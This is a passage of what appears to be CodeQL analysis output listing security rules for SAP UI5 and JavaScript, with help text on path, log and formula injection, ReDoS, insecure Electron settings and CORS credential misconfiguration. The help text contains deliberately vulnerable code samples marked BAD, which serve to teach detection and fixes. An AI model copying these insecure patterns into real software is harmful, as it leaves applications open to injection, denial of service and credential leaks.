This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-035" ], - "description" : "Constructing path from an uncontrolled remote source to be passed\n to a filesystem API allows for manipulation of the local filesystem.", - "id" : "js/ui5-path-injection", - "kind" : "path-problem", - "name" : "UI5 Path Injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/ui5-log-injection", - "name" : "js/ui5-log-injection", - "shortDescription" : { - "text" : "UI5 Log injection" - }, - "fullDescription" : { - "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n", - "markdown" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. 
If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-117" ], - "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", - "id" : "js/ui5-log-injection", - "kind" : "path-problem", - "name" : "UI5 Log injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/ui5-formula-injection", - "name" : "js/ui5-formula-injection", - "shortDescription" : { - "text" : "UI5 Formula Injection" - }, - "fullDescription" : { - "text" : "Saving data from an uncontrolled remote source 
using filesystem or local storage leads to disclosure of sensitive information or forgery of entry." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. 
For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n", - "markdown" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) 
may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-1236" ], - "description" 
: "Saving data from an uncontrolled remote source using filesystem or local storage\n leads to disclosure of sensitive information or forgery of entry.", - "id" : "js/ui5-formula-injection", - "kind" : "path-problem", - "name" : "UI5 Formula Injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - } ], - "locations" : [ { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/qlpack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - }, { - "name" : "codeql/javascript-queries", - "semanticVersion" : "0.8.1+8e890571ed7b21bc10698c5dbd032b9ed551d8f1", - "notifications" : [ { - "id" : "js/diagnostics/extraction-errors", - "name" : "js/diagnostics/extraction-errors", - "shortDescription" : { - "text" : "Extraction errors" - }, - "fullDescription" : { - "text" : "List all extraction errors for files in the source code directory." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "description" : "List all extraction errors for files in the source code directory.", - "id" : "js/diagnostics/extraction-errors", - "kind" : "diagnostic", - "name" : "Extraction errors" - } - }, { - "id" : "js/diagnostics/successfully-extracted-files", - "name" : "js/diagnostics/successfully-extracted-files", - "shortDescription" : { - "text" : "Successfully extracted files" - }, - "fullDescription" : { - "text" : "Lists all files in the source code directory that were extracted without encountering an error in the file." 
- }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "successfully-extracted-files" ], - "description" : "Lists all files in the source code directory that were extracted without encountering an error in the file.", - "id" : "js/diagnostics/successfully-extracted-files", - "kind" : "diagnostic", - "name" : "Successfully extracted files" - } - } ], - "rules" : [ { - "id" : "js/polynomial-redos", - "name" : "js/polynomial-redos", - "shortDescription" : { - "text" : "Polynomial regular expression used on uncontrolled data" - }, - "fullDescription" : { - "text" : "A regular expression that can require polynomial time to match may be vulnerable to denial-of-service attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. 
The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 
1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. 
The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 
1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], - "description" : "A regular expression that can require polynomial time\n to match may be vulnerable to denial-of-service attacks.", - "id" : "js/polynomial-redos", - "kind" : "path-problem", - "name" : "Polynomial regular expression used on uncontrolled data", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/redos", - "name" : "js/redos", - "shortDescription" : { - "text" : "Inefficient regular expression" - }, - "fullDescription" : { - "text" : "A regular expression that requires exponential time to match certain inputs can be a performance bottleneck, and may be vulnerable to denial-of-service attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. 
Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. 
Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. 
The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. 
Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], - "description" : "A regular expression that requires exponential time to match certain inputs\n can be a performance bottleneck, and may be vulnerable to denial-of-service\n attacks.", - "id" : "js/redos", - "kind" : "problem", - "name" : "Inefficient regular expression", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/disabling-electron-websecurity", - "name" : "js/disabling-electron-websecurity", - "shortDescription" : { - "text" : "Disabling Electron webSecurity" - }, - "fullDescription" : { - "text" : "Disabling webSecurity can cause critical security vulnerabilities." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n webSecurity: false\n }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n", - "markdown" : "# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. 
Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n webSecurity: false\n }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n" - }, - "properties" : { - "tags" : [ "security", "frameworks/electron", "external/cwe/cwe-79" ], - "description" : "Disabling webSecurity can cause critical security vulnerabilities.", - "id" : "js/disabling-electron-websecurity", - "kind" : "problem", - "name" : "Disabling Electron webSecurity", - "precision" : "very-high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/enabling-electron-insecure-content", - "name" : "js/enabling-electron-insecure-content", - "shortDescription" : { - "text" : "Enabling Electron allowRunningInsecureContent" - }, - "fullDescription" : { - "text" : "Enabling allowRunningInsecureContent can allow remote code execution." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. 
Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n allowRunningInsecureContent: true\n }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n", - "markdown" : "# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. 
Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n allowRunningInsecureContent: true\n }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n" - }, - "properties" : { - "tags" : [ "security", "frameworks/electron", "external/cwe/cwe-494" ], - "description" : "Enabling allowRunningInsecureContent can allow remote code execution.", - "id" : "js/enabling-electron-insecure-content", - "kind" : "problem", - "name" : "Enabling Electron allowRunningInsecureContent", - "precision" : "very-high", - "problem.severity" : "error", - "security-severity" : "8.8" - } - }, { - "id" : "js/cors-misconfiguration-for-credentials", - "name" : "js/cors-misconfiguration-for-credentials", - "shortDescription" : { - "text" : "CORS misconfiguration for credentials transfer" - }, - "fullDescription" : { - "text" : "Misconfiguration of CORS HTTP headers allows for leaks of secret credentials." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. 
The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin;\n // BAD: attacker can choose the value of origin\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin,\n whitelist = {\n \"https://example.com\": true,\n \"https://subdomain.example.com\": true,\n \"https://example.com:1337\": true\n };\n\n if (origin in whitelist) {\n // GOOD: the origin is in the whitelist\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n }\n\n // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: 
